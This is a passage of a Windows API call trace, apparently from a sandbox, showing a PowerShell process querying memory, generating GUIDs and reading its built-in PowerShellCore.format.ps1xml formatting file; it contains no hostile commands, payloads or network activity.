	[0318.298] VirtualQuery (in: lpAddress=0x1caff0, lpBuffer=0x1cbeb0, dwLength=0x30 | out: lpBuffer=0x1cbeb0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.298] VirtualQuery (in: lpAddress=0x1cb080, lpBuffer=0x1cbf40, dwLength=0x30 | out: lpBuffer=0x1cbf40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.298] VirtualQuery (in: lpAddress=0x1caff0, lpBuffer=0x1cbeb0, dwLength=0x30 | out: lpBuffer=0x1cbeb0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.298] VirtualQuery (in: lpAddress=0x1cb080, lpBuffer=0x1cbf40, dwLength=0x30 | out: lpBuffer=0x1cbf40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.298] VirtualQuery (in: lpAddress=0x1caff0, lpBuffer=0x1cbeb0, dwLength=0x30 | out: lpBuffer=0x1cbeb0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.298] VirtualQuery (in: lpAddress=0x1cb080, lpBuffer=0x1cbf40, dwLength=0x30 | out: lpBuffer=0x1cbf40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.299] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.299] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.299] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.299] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.299] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.300] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.300] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.300] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x3adc724c, Data2=0xbcb, Data3=0x40fc, Data4=([0]=0x8a, [1]=0x61, [2]=0x38, [3]=0x85, [4]=0xc0, [5]=0xc3, [6]=0xa7, [7]=0x26))) returned 0x0
	[0318.300] VirtualQuery (in: lpAddress=0x1cb900, lpBuffer=0x1cc7c0, dwLength=0x30 | out: lpBuffer=0x1cc7c0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.300] VirtualQuery (in: lpAddress=0x1cb900, lpBuffer=0x1cc7c0, dwLength=0x30 | out: lpBuffer=0x1cc7c0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.300] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.300] VirtualQuery (in: lpAddress=0x1cb900, lpBuffer=0x1cc7c0, dwLength=0x30 | out: lpBuffer=0x1cc7c0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.301] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.301] VirtualQuery (in: lpAddress=0x1cb900, lpBuffer=0x1cc7c0, dwLength=0x30 | out: lpBuffer=0x1cc7c0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.301] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.301] VirtualQuery (in: lpAddress=0x1cb900, lpBuffer=0x1cc7c0, dwLength=0x30 | out: lpBuffer=0x1cc7c0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.301] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.302] VirtualQuery (in: lpAddress=0x1cb900, lpBuffer=0x1cc7c0, dwLength=0x30 | out: lpBuffer=0x1cc7c0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.302] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.302] VirtualQuery (in: lpAddress=0x1cb900, lpBuffer=0x1cc7c0, dwLength=0x30 | out: lpBuffer=0x1cc7c0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.302] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.302] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.302] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.303] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.303] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.303] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.303] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.303] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.303] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x6f229294, Data2=0x34a6, Data3=0x497d, Data4=([0]=0xb9, [1]=0x76, [2]=0xaf, [3]=0x1e, [4]=0x8b, [5]=0xfa, [6]=0xa4, [7]=0x28))) returned 0x0
	[0318.303] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.304] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.304] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.304] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.304] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.304] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.304] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.304] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.304] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.304] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.305] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.305] VirtualQuery (in: lpAddress=0x1cb5c0, lpBuffer=0x1cc480, dwLength=0x30 | out: lpBuffer=0x1cc480*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.305] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.305] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.305] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.305] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.305] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x8fecb837, Data2=0xbbd3, Data3=0x4528, Data4=([0]=0x85, [1]=0xd5, [2]=0x3c, [3]=0xfc, [4]=0xbb, [5]=0x72, [6]=0x99, [7]=0x15))) returned 0x0
	[0318.306] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x941f3986, Data2=0xb746, Data3=0x427c, Data4=([0]=0x9e, [1]=0x3d, [2]=0x94, [3]=0xac, [4]=0xf8, [5]=0x60, [6]=0x36, [7]=0x7c))) returned 0x0
	[0318.306] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x82def6c1, Data2=0xbc91, Data3=0x45c4, Data4=([0]=0xb1, [1]=0x2b, [2]=0xc, [3]=0xc1, [4]=0x18, [5]=0x7, [6]=0x93, [7]=0xb4))) returned 0x0
	[0318.306] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x2cd1e4f0, Data2=0x6597, Data3=0x4947, Data4=([0]=0xba, [1]=0xab, [2]=0x3c, [3]=0x57, [4]=0x75, [5]=0x4c, [6]=0x96, [7]=0x10))) returned 0x0
	[0318.307] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x78de7552, Data2=0xe3db, Data3=0x4e38, Data4=([0]=0xb1, [1]=0xa1, [2]=0xc7, [3]=0x11, [4]=0x3, [5]=0x29, [6]=0x15, [7]=0x4d))) returned 0x0
	[0318.307] VirtualQuery (in: lpAddress=0x1cb6d0, lpBuffer=0x1cc590, dwLength=0x30 | out: lpBuffer=0x1cc590*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.307] VirtualQuery (in: lpAddress=0x1cb760, lpBuffer=0x1cc620, dwLength=0x30 | out: lpBuffer=0x1cc620*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.307] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xd2dfaf7a, Data2=0x7500, Data3=0x4635, Data4=([0]=0xb9, [1]=0x13, [2]=0x18, [3]=0xfc, [4]=0xab, [5]=0x99, [6]=0xb3, [7]=0xe0))) returned 0x0
	[0318.307] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x922a0893, Data2=0xa925, Data3=0x4dea, Data4=([0]=0x8d, [1]=0xfc, [2]=0xe7, [3]=0xd3, [4]=0x3, [5]=0x9b, [6]=0x81, [7]=0x8b))) returned 0x0
	[0318.308] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x9f0cc8f3, Data2=0x86f9, Data3=0x4bec, Data4=([0]=0xa7, [1]=0xf6, [2]=0x9d, [3]=0x50, [4]=0xfd, [5]=0xfb, [6]=0xdc, [7]=0x2e))) returned 0x0
	[0318.308] SetErrorMode (uMode=0x1) returned 0x1
	[0318.308] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0318.308] GetFileType (hFile=0x330) returned 0x1
	[0318.308] SetErrorMode (uMode=0x1) returned 0x1
	[0318.309] GetFileType (hFile=0x330) returned 0x1
	[0318.309] ReadFile (in: hFile=0x330, lpBuffer=0x2ffd4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd4d8*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.309] ReadFile (in: hFile=0x330, lpBuffer=0x2ffd4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd4d8*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.310] ReadFile (in: hFile=0x330, lpBuffer=0x2ffd4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd4d8*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.310] ReadFile (in: hFile=0x330, lpBuffer=0x2ffd4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd4d8*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.310] ReadFile (in: hFile=0x330, lpBuffer=0x2ffd4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd4d8*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.310] ReadFile (in: hFile=0x330, lpBuffer=0x2ffd4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd4d8*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.310] ReadFile (in: hFile=0x330, lpBuffer=0x2ffd4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd4d8*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.311] ReadFile (in: hFile=0x330, lpBuffer=0x2ffd4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd4d8*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.311] ReadFile (in: hFile=0x330, lpBuffer=0x2ffd4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd4d8*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.312] ReadFile (in: hFile=0x330, lpBuffer=0x2ffd4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd4d8*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.312] ReadFile (in: hFile=0x330, lpBuffer=0x2ffd4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd4d8*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.312] ReadFile (in: hFile=0x330, lpBuffer=0x2ffd4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd4d8*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.313] ReadFile (in: hFile=0x330, lpBuffer=0x2ffd4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd4d8*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.313] ReadFile (in: hFile=0x330, lpBuffer=0x2ffd4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd4d8*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.313] ReadFile (in: hFile=0x330, lpBuffer=0x2ffd4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd4d8*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.313] ReadFile (in: hFile=0x330, lpBuffer=0x2ffd4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd4d8*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.313] ReadFile (in: hFile=0x330, lpBuffer=0x2ffd4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd4d8*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.315] ReadFile (in: hFile=0x330, lpBuffer=0x2ffd4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd4d8*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.315] ReadFile (in: hFile=0x330, lpBuffer=0x2ffd4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd4d8*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.315] ReadFile (in: hFile=0x330, lpBuffer=0x2ffd4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd4d8*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.316] ReadFile (in: hFile=0x330, lpBuffer=0x2ffd4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd4d8*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.316] ReadFile (in: hFile=0x330, lpBuffer=0x2ffd4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd4d8*, lpNumberOfBytesRead=0x1cceb8*=0xe67, lpOverlapped=0x0) returned 1
	[0318.316] ReadFile (in: hFile=0x330, lpBuffer=0x2ffcaa7, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ffcaa7*, lpNumberOfBytesRead=0x1cceb8*=0x0, lpOverlapped=0x0) returned 1
	[0318.316] ReadFile (in: hFile=0x330, lpBuffer=0x2ffd4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd4d8*, lpNumberOfBytesRead=0x1cceb8*=0x0, lpOverlapped=0x0) returned 1
	[0318.317] SetErrorMode (uMode=0x1) returned 0x1
